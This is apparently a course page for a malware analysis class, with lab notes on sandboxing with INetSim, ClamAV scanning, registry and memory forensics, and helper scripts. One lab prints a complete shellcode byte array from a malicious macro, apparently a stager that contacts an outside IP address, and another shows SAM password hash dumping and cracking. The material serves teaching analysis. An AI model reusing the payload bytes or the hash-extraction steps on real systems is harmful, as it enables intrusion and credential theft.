Malware Analysis and Reverse Engineering (IAM302)
- Topic 1: Introduction
- Topic 2: Fundamentals of malware analysis
- Topic 3: Malware classification
- Topic 4: Examining AV signature
- Topic 5: Customizing AV database
- Topic 6: MA sandboxes
- Topic 7: AV scanners
- Topic 8: Review & progress test
- Topic 9: Malware Lab Integrity
- Topic 10: Recipe Manipulating HTTP/HTTPS
- Topic 11: Cloning and imaging disks
- Topic 12: Dynamic analysis tools
- Topic 13: Malware forensics
- Topic 14: Identifying packers
- Topic 15: Registry forensics
- Topic 16: Case studies
- Topic 17: Malware debugging
- Topic 18: JIT debugger for shellcode analysis
- Topic 19: Memory forensics
- Topic 20: Course Review
Labs
Config inetsim.conf
- Edit inetsim.conf (on Ubuntu/REMnux it is /etc/inetsim/inetsim.conf); both options are commented out by default, so uncomment and change them:
#service_bind_address 10.10.10.1
→ service_bind_address 0.0.0.0
#dns_default_ip 10.10.10.1
→ dns_default_ip 192.168.56.105
- service_bind_address 0.0.0.0 makes every simulated service (DNS, HTTP, SMTP, ...) listen on all interfaces of the analysis machine, so keep that machine on the isolated host-only network only; dns_default_ip is the address INetSim's fake DNS hands out for every name the sample resolves, so it must be the address on which the victim VM reaches INetSim (here 192.168.56.105 on the host-only adapter)
- Run commands:
$ inetsim
to start, and Ctrl + C to stop the INetSim service
- Note: remember to restart the inetsim service after editing the file as above; the configuration is only read when the service starts
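As an added example (not part of the course page or of INetSim itself), a small Python helper that applies the two edits above to an inetsim.conf text and checks the result before the service is started. The DEFAULT_CONF excerpt, the function names and the 192.168.56.0/24 lab network are assumptions made for the example:

```python
import ipaddress
import re

# Constructed excerpt of a stock inetsim.conf: both options still commented out.
DEFAULT_CONF = """\
# INetSim configuration file (excerpt constructed for this example)
#service_bind_address 10.10.10.1
#dns_default_ip 10.10.10.1
start_service dns
start_service http
"""

# "key value" lines, optionally commented out with a leading '#'
_OPTION = re.compile(r"^[ \t]*(#?)[ \t]*([A-Za-z_]+)[ \t]+(\S+)[ \t]*$")


def effective_options(conf_text):
    """Active (uncommented) options; a repeated key keeps its last value, which is
    fine for the single-valued options checked here (start_service is list-valued)."""
    opts = {}
    for line in conf_text.splitlines():
        m = _OPTION.match(line)
        if m and m.group(1) == "":
            opts[m.group(2)] = m.group(3)
    return opts


def set_option(conf_text, key, value):
    """Make 'key value' active: rewrite the first commented-out or active definition
    of key, or append one if the file has none."""
    pattern = re.compile(rf"^[ \t]*#?[ \t]*{re.escape(key)}[ \t]+\S+[ \t]*$", re.M)
    new_line = f"{key} {value}"
    if pattern.search(conf_text):
        return pattern.sub(new_line, conf_text, count=1)
    return conf_text.rstrip("\n") + "\n" + new_line + "\n"


def lab_config(conf_text, inetsim_ip):
    """The two edits from the lab: bind on every interface, answer all DNS queries
    with our own address."""
    text = set_option(conf_text, "service_bind_address", "0.0.0.0")
    return set_option(text, "dns_default_ip", inetsim_ip)


def check_lab_config(conf_text, lab_net):
    """Things to verify before starting INetSim. Returns a list of findings."""
    opts = effective_options(conf_text)
    net = ipaddress.ip_network(lab_net)
    findings = []
    dns_ip = opts.get("dns_default_ip")
    if dns_ip is None:
        findings.append("dns_default_ip not set; INetSim falls back to its built-in default")
    elif ipaddress.ip_address(dns_ip) not in net:
        # the victim VM would resolve every name to an address it cannot reach
        findings.append(f"dns_default_ip {dns_ip} is outside the lab network {net}")
    bind = opts.get("service_bind_address")
    if bind is None:
        findings.append("service_bind_address not set; INetSim falls back to its built-in default")
    elif bind == "0.0.0.0":
        # convenient, but every interface of the analysis box now serves fake services
        findings.append("service_bind_address 0.0.0.0 listens on all interfaces; keep this host on the isolated lab network only")
    elif ipaddress.ip_address(bind) not in net:
        findings.append(f"service_bind_address {bind} is not on the lab network {net}")
    return findings


if __name__ == "__main__":
    fixed = lab_config(DEFAULT_CONF, "192.168.56.105")
    print(fixed)
    for finding in check_lab_config(fixed, "192.168.56.0/24"):
        print("finding:", finding)
```

Binding to 0.0.0.0 is reported as a finding on purpose: it is what the lab does, and it is acceptable only because the analysis host has no other network path.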
How to install and use ClamAV on Ubuntu-based OS
- Install:
sudo apt-get install clamav
- Update the virus database:
sudo freshclam
(on Ubuntu the clamav-freshclam service already does this in the background; if a manual run fails because the log or database is locked, stop that service first with sudo systemctl stop clamav-freshclam)
- Scan the current directory:
clamscan
- The infected, remove, and recursive switches:
clamscan --infected (or -i): only report infected files, without removing them
clamscan --remove: delete infected files (irreversible; in a lab prefer --move=DIR or --copy=DIR to quarantine the sample instead)
clamscan --recursive (or -r): scan a directory and all of its subdirectories
- Some helpful examples:
- Scan the current directory and all of its subdirectories for infected files and report them to the standard output:
clamscan --recursive --infected .
- Scan the current directory and all of its subdirectories for infected files and remove them:
clamscan --recursive --remove .
- Scan only files whose path matches a regular expression, here the extension .txt:
clamscan --include='.*\.txt$' /path/to/scan
- Scan all files but exclude those matching a regular expression, here the extension .log:
clamscan --exclude='.*\.log$' /path/to/scan
- A scan exits with status 0 when nothing was found, 1 when an infected file was found, and 2 on error, which is what a script should check rather than parsing the summary
Decode the dumped file to an executable file
- The dump (here dump3) holds the payload as comma-separated decimal byte values; the script converts each value back to one byte and writes the binary:
#!/usr/bin/env python3
# Rebuild a binary from a dump of comma-separated decimal byte values (0-255)
with open("dump3") as dumpfile:
    data = dumpfile.read()
# one byte per field; surrounding whitespace and a trailing newline are ignored
payload = bytes(int(v) for v in data.split(",") if v.strip())
with open("final_file.bin", "wb") as finalfile:
    finalfile.write(payload)
Converting the VBA array into a Python list
- The shellcode is copied out of the macro's Byte array as a list of signed integers (-128..127), so each element is packed as one signed char to rebuild the original bytes:
import struct
myList = [-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 74, 29, 0, 0, 83, 80, 104, 87, -119, -97, -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, -1, -1, 47, 116, 97, 79, 56, 0, -21, 16, 49, -71, -117, 51, 127, -117, -33, 54, 31, -69, -19, 48, 21, -37, -56, -107, -59, 23, -88, -63, 0, -104, -116, -51, -104, 65, -48, -118, -80, 62, 123, -103, -51, -124, -11, -27, 50, 17, -77, -115, 98, 29, 106, -71, -108, 35, 99, -94, 70, 89, -41, 14, -9, 114, -126, -101, -95, -16, -75, 44, 28, 59, -70, 123, -27, 55, 63, -86, 8, 66, -3, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, 83, 73, 69, 32, 55, 
46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 48, 41, 13, 10, 0, 62, 73, 5, 8, -70, 26, -68, 95, 117, -58, -111, -107, 21, 47, -40, -43, 89, 118, 112, -18, 17, 116, -104, 95, 44, -45, -100, -125, 106, 75, -7, -57, 92, -90, -44, -128, -53, 22, -20, 101, 119, -65, -69, -87, 29, 90, 118, 66, 24, 20, -60, 86, -86, -69, 89, 56, 15, 74, 78, 113, 44, 73, -16, -52, -119, 13, 5, -24, -71, -64, 127, -79, -61, -126, -53, -105, -7, 76, -108, -60, -75, 41, -101, -61, -14, -10, 65, 120, -70, -117, -120, 55, -110, 51, 94, -73, -52, 82, -66, 10, -103, -105, -92, 32, -44, 8, -88, 126, 14, 75, -29, -72, -19, -87, 5, -61, 7, -109, -41, 23, -91, -116, 41, 24, -84, -47, 6, -99, 110, -117, 78, -47, 1, -112, -55, 29, 110, 32, 30, -83, 107, -101, 65, 111, -73, 113, -100, 64, -117, -103, -117, -30, 73, 102, 66, 76, -3, -51, 56, -66, -33, -73, -2, -5, -116, 17, 71, 75, 39, 61, 69, -44, 48, 5, -28, 108, -42, -58, -116, -5, 112, 42, -91, -69, 30, -90, 46, -20, -50, -18, -37, -54, -125, -27, 90, 30, 106, 62, -73, -88, 102, -113, 105, 116, 96, -101, 73, -9, -15, -8, 20, -125, -63, -7, 15, -124, 49, 6, -61, -87, 24, -84, 72, -113, 38, 32, 0, -30, 5, 124, 52, 18, -99, 46, 11, 56, -9, -14, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 52, 55, 46, 57, 51, 46, 54, 51, 46, 49, 55, 57, 0, 18, 52, 86, 120]
# VBA prints the bytes as signed values; struct 'b' packs one signed char (-128..127)
with open("shellcode.bin", "wb") as shell_code:
    for i in myList:
        shell_code.write(struct.pack('b', i))
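The two scripts above (the dump3 decoder and the VBA array loop) do the same job for two notations, and struct.pack('b') fails as soon as a value above 127 appears. The following is an added example, not code from the course page: one decoder that accepts either notation, rejects values that do not fit in a byte, pulls out printable strings the way strings(1) does, and applies a prologue heuristic to the result. SAMPLE_VBA and SAMPLE_DUMP are constructed for the example (the nine leading bytes and the User-Agent fragment are values that appear in the list above); the function names are mine.

```python
import re

# Constructed samples. Both encode the same 33 bytes: nine bytes of a common
# x86 stager prologue (cld; call ...; pushad; mov ebp,esp), the ASCII text
# "User-Agent: Mozilla/4.0" and a terminating NUL. SAMPLE_VBA is the signed
# Array() form a macro carries; SAMPLE_DUMP is the unsigned comma list like dump3.
SAMPLE_VBA = ("Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, "
              "85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, "
              "77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 0)")
SAMPLE_DUMP = ("252,232,137,0,0,0,96,137,229,"
               "85,115,101,114,45,65,103,101,110,116,58,32,"
               "77,111,122,105,108,108,97,47,52,46,48,0")


def parse_byte_values(text):
    """Every decimal integer in the dump, whether it is a bare comma list, a VBA
    Array(...) literal, or spread over several lines. Decimal only; a hex dump
    needs a different tokenizer."""
    return [int(tok) for tok in re.findall(r"-?\d+", text)]


def to_bytes(values):
    """Ints to bytes. VBA (like Java) prints bytes as signed values, so -128..-1
    are the same byte as 128..255; anything outside -128..255 is not a byte and
    means the dump was parsed wrongly, so fail instead of truncating."""
    out = bytearray()
    for v in values:
        if not -128 <= v <= 255:
            raise ValueError(f"{v} does not fit in one byte")
        out.append(v & 0xFF)
    return bytes(out)


def decode_dump(text):
    return to_bytes(parse_byte_values(text))


def printable_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len long, as strings(1) would report."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def looks_like_x86_stager(data):
    """Heuristic only: many x86 stagers (Metasploit's block_api style) open with
    cld (0xFC) followed by call (0xE8) so the code can locate its API-hash block."""
    return data[:2] == b"\xfc\xe8"


def write_binary(text, path):
    """Decode the dump and write it out; returns the bytes for further checks."""
    data = decode_dump(text)
    with open(path, "wb") as fh:
        fh.write(data)
    return data


if __name__ == "__main__":
    data = write_binary(SAMPLE_VBA, "shellcode.bin")
    print(len(data), "bytes; stager prologue:", looks_like_x86_stager(data))
    for s in printable_strings(data):
        print("string:", s)
```

Feed the real Array() text or dump3 contents to write_binary and the result is what a debugger or a shellcode emulator loads; the strings pass is the quick triage that usually surfaces the User-Agent, URI and C2 address before any debugging starts.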
Install FOG server
- https://docs.fogproject.org/en/latest/installation/server/install-fog-server/
- Reset the FOG web UI password (the fog user's password hash is stored in the users table of the fog database):
- If the root user in MySQL does not have a password (or it's stored in ~/.my.cnf):
sudo mysql -u root fog
- If the root user in MySQL does have a password:
sudo mysql -u root -p fog
- Run this query to reset the password to "password", then change it again from the web UI after logging in:
UPDATE users SET uPass = MD5('password') WHERE uName = 'fog'; exit;
Capturing packets with Tshark via Python
- The TShark class comes from the analysis module (here assumed to be the one distributed with the Malware Analyst's Cookbook listed under Books); it wraps tshark to capture the traffic of one host into a pcap and to summarise it afterwards. The session below is Python 2.7 (hence the print statement) and was run as root, which is why tshark prints its warning:
Python 2.7.18 (default, Jul 1 2022, 10:30:50)
[GCC 11.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from analysis import TShark
>>> cap = TShark("/tmp/mu.pcap")
>>> cap.start("enp0s3","10.0.2.15")
>>> Running as user "root" and group "root". This could be dangerous.
Capturing on 'enp0s3'
** (tshark:4588) 15:59:30.271227 [Main MESSAGE] -- Capture started.
** (tshark:4588) 15:59:30.271861 [Main MESSAGE] -- File: "/tmp/mu.pcap"
22
>>> cap.stop()
>>> print cap.read()
>>> quit()
Output:
[REMOVED]
===================================================================
IP Addresses value rate percent
-------------------------------------------------------------------
192.168.1.141 90 0.014359 100.00%
8.8.8.8 40 0.006382 44.44%
91.189.90.40 12 0.001915 13.33%
63.245.209.93 10 0.001595 11.11%
96.17.106.105 28 0.004467 31.11%
[REMOVED]
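Added example, not the cookbook's analysis module: a Python 3 equivalent of the start/read workflow above that builds the tshark command lines and parses the per-address table shown in the output, then filters it down to the public addresses the sample actually contacted. It assumes the table format tshark prints for -z ip_hosts,tree (the same shape as above); SAMPLE_STATS is constructed from the table above, and the function names are mine.

```python
import ipaddress
import re

# Constructed sample in the shape tshark prints for "-z ip_hosts,tree"; the
# addresses and counts are the ones from the output above.
SAMPLE_STATS = """\
===================================================================
IP Addresses           value        rate        percent
-------------------------------------------------------------------
192.168.1.141          90           0.014359    100.00%
8.8.8.8                40           0.006382    44.44%
91.189.90.40           12           0.001915    13.33%
63.245.209.93          10           0.001595    11.11%
96.17.106.105          28           0.004467    31.11%
===================================================================
"""

# one table row: address, packet count, rate, percent
_ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)\s+([\d.]+)\s+([\d.]+)%\s*$")


def capture_cmd(iface, victim_ip, pcap):
    """argv that captures everything to or from the victim VM into a pcap
    (capture filter, so unrelated lab traffic never hits the disk)."""
    return ["tshark", "-i", iface, "-f", f"host {victim_ip}", "-w", pcap]


def stats_cmd(pcap):
    """argv that prints only the per-address statistics of a saved pcap."""
    return ["tshark", "-q", "-r", pcap, "-z", "ip_hosts,tree"]


def parse_ip_hosts(text):
    """Rows of (ip, packets, rate, percent); banner and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), float(m.group(3)), float(m.group(4))))
    return rows


def external_hosts(rows):
    """Drop private, loopback, link-local and multicast addresses: what is left is
    what the sample talked to on the internet, busiest first."""
    out = [r for r in rows if ipaddress.ip_address(r[0]).is_global]
    return sorted(out, key=lambda r: r[1], reverse=True)


def collect(pcap):
    """Run tshark on a pcap and return the external hosts (needs tshark installed)."""
    import subprocess
    out = subprocess.run(stats_cmd(pcap), capture_output=True, text=True, check=True).stdout
    return external_hosts(parse_ip_hosts(out))


if __name__ == "__main__":
    import sys
    rows = collect(sys.argv[1]) if len(sys.argv) > 1 else external_hosts(parse_ip_hosts(SAMPLE_STATS))
    for ip, pkts, _, pct in rows:
        print(f"{ip:16} {pkts:5d} packets {pct:6.2f}%")
```

In the sample the victim's own 192.168.1.141 drops out and 8.8.8.8 (the DNS resolver INetSim would normally stand in for) tops the list, which is the first thing to compare against the process activity captured at the same time.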
Discovering alternate data streams with TSK
- Create an ADS (a second, named $DATA attribute on host.txt; dir and type do not show it and the reported file size does not change):
echo "this is a message" > host.txt:stream
, or:
notepad host.txt:stream
- Read or modify the stream:
notepad host.txt:stream
more < host.txt:stream
dir /R
streams64 host.txt
(the Sysinternals Streams utility; streams64 -d host.txt deletes the streams it finds)
- PowerShell 3.0 and later include six cmdlets with a -Stream parameter to directly manipulate ADS content (Get-Item, Get-Content, Set-Content, Add-Content, Clear-Content, Remove-Item)
- Finding:
Get-Item .\host.txt -Stream *
- Reading:
Get-Item .\host.txt | Get-Content -Stream stream
- Reference: Friday Fun with PowerShell and Alternate Data Streams
Registry Forensics with RegRipper plug-ins
- Here's a list of the registry hives present in almost all Windows systems, and the files that back them (all under %SystemRoot%\System32\config, except Ntuser.dat, which lives in each user's profile directory):
HKEY_CURRENT_CONFIG: supported by the System, System.alt, System.log, and System.sav files
HKEY_CURRENT_USER: supported by the Ntuser.dat and Ntuser.dat.log files
HKEY_LOCAL_MACHINE\SAM: supported by the Sam, Sam.log, and Sam.sav files
HKEY_LOCAL_MACHINE\Security: supported by the Security, Security.log, and Security.sav files
HKEY_LOCAL_MACHINE\Software: supported by the Software, Software.log, and Software.sav files
HKEY_LOCAL_MACHINE\System: supported by the System, System.alt, System.log, and System.sav files
HKEY_USERS\.DEFAULT: supported by the Default, Default.log, and Default.sav files
- In digital forensics, these registry hives can tell investigators:
HKEY_CURRENT_CONFIG: a link, not a hive of its own, to the key holding the computer's current hardware profile (HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current)
HKEY_CURRENT_USER: the settings of the currently logged-on user (e.g., what software he/she typically uses); every user has their own Ntuser.dat, so on an image you examine the one in the suspect's profile directory
HKEY_LOCAL_MACHINE\SAM: local user accounts and local group membership, including the password hashes (encrypted with a key derived from the SYSTEM hive, which is why hashdump needs both), and the rights granted to each local user and group. Domain accounts are not here; they live in Active Directory on the domain controller
HKEY_LOCAL_MACHINE\Security: the local system security policy: which domains are trusted to authenticate login attempts, which users are allowed to access the system and on what channels, which privileges are assigned to a user, how users are audited, plus the cached domain logon credentials and the LSA secrets (service account passwords)
HKEY_LOCAL_MACHINE\Software: most of the configuration information for the software installed on the computer and for the OS itself
HKEY_LOCAL_MACHINE\System: the configuration used to boot and run the machine: the control sets (services, drivers, enumerated hardware, mounted devices, computer name, time zone) and the Select key that records which ControlSet is current
HKEY_USERS\.DEFAULT: the profile hive of the LocalSystem account (also what the logon screen runs under), backed by the Default file above. It is not the template for new users: that is C:\Users\Default\NTUSER.DAT, which is copied when a user logs on for the first time without an existing profile
- Windows Registry Forensics (rip.pl -r <hive file> -p <plugin>; run it against hive files extracted from the image, SOFTWARE and SYSTEM from System32\config and NTUSER.DAT from the user's profile directory, and use rip.pl -l to list the available plugins)
- Determining installed product information:
perl rip.pl -r software -p product
- Determining the product type:
perl rip.pl -r system -p producttype
- Determining the Windows version:
perl rip.pl -r software -p winver
- Determining the network cards used:
perl rip.pl -r software -p networkcards
- Determining the DHCP information:
perl rip.pl -r system -p nic
- Determining the wireless access points information:
perl rip.pl -r software -p ssid
- Determining the shutdown time:
perl rip.pl -r system -p shutdown
- Determining the time zone:
perl rip.pl -r system -p timezone
- Determining all installed applications:
perl rip.pl -r software -p uninstall
- Determining user SIDs:
perl rip.pl -r software -p profilelist
- Determining the recent documents used:
perl rip.pl -r NTUSER.DAT -p recentdocs
- Extracting information from the winlogon key:
perl rip.pl -r software -p winlogon
- Determining suspect’s web-browsing history:
perl rip.pl -r NTUSER.DAT -p typedurls
- Collecting information about unread emails:
perl rip.pl -r NTUSER.DAT -p unreadmail
- Determining applications set to auto start:
perl rip.pl -r NTUSER.DAT -p user_run
- Determining the value of the userinit registry key:
perl rip.pl -r software -p userinit
- Determining the user’s printers:
perl rip.pl -r NTUSER.DAT -p printers
- Collecting information about Cain & Abel:
perl rip.pl -r NTUSER.DAT -p cain
Install volatility on CentOS 7
- Download: https://forensics.cert.org/cert-forensics-tools-release-el7.rpm
- Run the following commands:
yum install epel-release.noarch
rpm -Uvh cert-forensics-tools-release-el7.rpm
yum --enablerepo=forensics install Volatility
- Check:
volatility -h
(this installs Volatility 2.x, whose --profile syntax is what the commands below use)
Memory dump & analysis tools
- Image information (lists the suggested profiles; one of them goes into --profile below):
volatility imageinfo -f memdump.mem
- Running processes:
volatility pslist --profile=Win2008SP1x86 -f memdump.mem
- Console commands:
volatility consoles --profile=Win2008SP1x86 -f memdump.mem
- Services:
volatility svcscan --profile=Win2008SP1x86 -f memdump.mem
- Network connections:
volatility netscan --profile=Win2008SP1x86 -f memdump.mem
- Registry hives (virtual and physical offset of every hive loaded in the dump):
volatility hivelist --profile=Win2008SP1x86 -f memdump.mem
- In this dump the virtual addresses of the SAM and SYSTEM hives are 0x89c33450 and 0x86226008
- Password hashes (-y is the SYSTEM hive, which holds the boot key needed to decrypt the hashes, and -s is the SAM hive; Volatility 2 locates both itself if they are omitted):
volatility hashdump --profile=Win2008SP1x86 -f memdump.mem -y 0x86226008 -s 0x89c33450
- Free Password Hash Cracker: an online service for looking up the LM/NT hashes that hashdump prints (or crack them offline with hashcat)
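Added example, not a Volatility plugin: parsing hivelist output to pick the SYSTEM and SAM hives, filling -y and -s in from it, and triaging what hashdump returns. SAMPLE_HIVELIST is constructed around the two addresses above (the other rows are typical entries); SAMPLE_HASHDUMP is constructed, with the analyst line carrying the well-known LM and NT hashes of the string "password"; the function names are mine.

```python
import re

# Constructed hivelist output in Volatility 2's format, built around the SAM and
# SYSTEM addresses from the lab above; the other rows are typical entries.
SAMPLE_HIVELIST = r"""
Volatility Foundation Volatility Framework 2.6
Virtual    Physical   Name
---------- ---------- ----
0x8b00e008 0x1e35c008 [no name]
0x86226008 0x02c1a008 \REGISTRY\MACHINE\SYSTEM
0x86256008 0x01fb4008 \REGISTRY\MACHINE\HARDWARE
0x89c33450 0x0b9d6450 \SystemRoot\System32\Config\SAM
0x89c64008 0x0a25c008 \SystemRoot\System32\Config\SECURITY
0x8b7ab008 0x12fb6008 \SystemRoot\System32\Config\SOFTWARE
0x8c0d1008 0x0ed33008 \??\C:\Users\Administrator\ntuser.dat
"""

# Constructed pwdump-style hashdump output. The analyst line carries the
# well-known LM and NT hashes of the string "password".
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
analyst:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", also shown when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""

_HIVE_ROW = re.compile(r"^(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(.+?)\s*$")


def parse_hivelist(text):
    """(virtual, physical, name) for every hive row; banner and header are skipped."""
    rows = []
    for line in text.splitlines():
        m = _HIVE_ROW.match(line)
        if m:
            rows.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
    return rows


def find_hive(rows, leaf):
    """Virtual address of the single hive whose path ends in \\leaf (case-insensitive).
    Refuses to guess when there are several, e.g. a SAM from a second volume."""
    hits = [v for v, _, name in rows if name.upper().rsplit("\\", 1)[-1] == leaf.upper()]
    if len(hits) != 1:
        raise LookupError(f"expected exactly one {leaf} hive, found {len(hits)}")
    return hits[0]


def hashdump_cmd(memfile, profile, rows):
    """The command from the lab with -y (SYSTEM, holds the boot key) and -s (SAM)
    filled in from hivelist instead of copied by hand."""
    return ["volatility", "hashdump", f"--profile={profile}", "-f", memfile,
            "-y", hex(find_hive(rows, "SYSTEM")), "-s", hex(find_hive(rows, "SAM"))]


def parse_hashdump(text):
    """(user, rid, lm, nt) per line of pwdump-format output."""
    out = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and parts[1].isdigit():
            out.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return out


def triage_hashes(entries):
    """What to look at first: accounts with an empty password, and accounts whose
    LM hash is actually stored (LM is trivially crackable and should be disabled)."""
    return {
        "empty_password": [u for u, _, _, nt in entries if nt == EMPTY_NT],
        "lm_stored": [u for u, _, lm, _ in entries if lm != EMPTY_LM],
    }


if __name__ == "__main__":
    rows = parse_hivelist(SAMPLE_HIVELIST)
    print(" ".join(hashdump_cmd("memdump.mem", "Win2008SP1x86", rows)))
    print(triage_hashes(parse_hashdump(SAMPLE_HASHDUMP)))
```

Piping the real hivelist and hashdump output through these functions gives the same -y/-s pair the lab lists by hand, and flags the two things worth reporting before any cracking starts: accounts that need no password at all, and LM hashes that a rainbow table will resolve in seconds.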
Books
- James Aquilina, Cameron Malin, Eoghan Casey. Malware Forensics: Investigating and Analyzing Malicious Code, Syngress Publishing © 2008.
- Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard. Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code, Wiley Publishing © 2011 (ISBN: 978-0470613030).
- Michael Sikorski, Andrew Honig. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software, No Starch Press © 2012 (ISBN: 978-1-59327-290-6).
URLs
- 7-Zip: a file archiver with a high compression ratio
- Autopsy®
- Easy_CrackMe
- eicar.com.txt (malicious code sample)
- Faronics_DFS
- Malware test files: PE, APK, MacOSX, ELF
- MoonSols: Windows Memory Toolkit
- Nmap (“Network Mapper”)
- OllyDbg v1.10
- PE iDentifier v0.95 (2008.11.03)
- Practical Malware Analysis Labs
- Process Monitor v3.96 (03/09/2023)
- RegRipper v2.8
- Streams v1.6 (03/24/2021)
- UPX 4.2.2 (2024.01.04)
- Windows sample memory dump
Course Implementation Plan (old version)
- Session 1: Course Overview
- Session 2: Overview of Malware and Malware Analysis
- Session 3: Basic Dynamic Analysis
- Session 4: Basic Static Technique
- Session 5: Assembly Language Overview
- Session 6: IDA Pro
- Session 7: Analyzing Malicious Windows Programs
- Session 8: Windows Internals and API
- Session 9: Debugging
- Session 10: Malware Analysis with OllyDbg and Windbg
- Session 11: Kernel Debugging with Windbg
- Session 12: Malware Behaviour and Mechanism
- Session 13: Covert Malware Launching
- Session 14: Malware stealth technique
- Session 15: Mobile Malware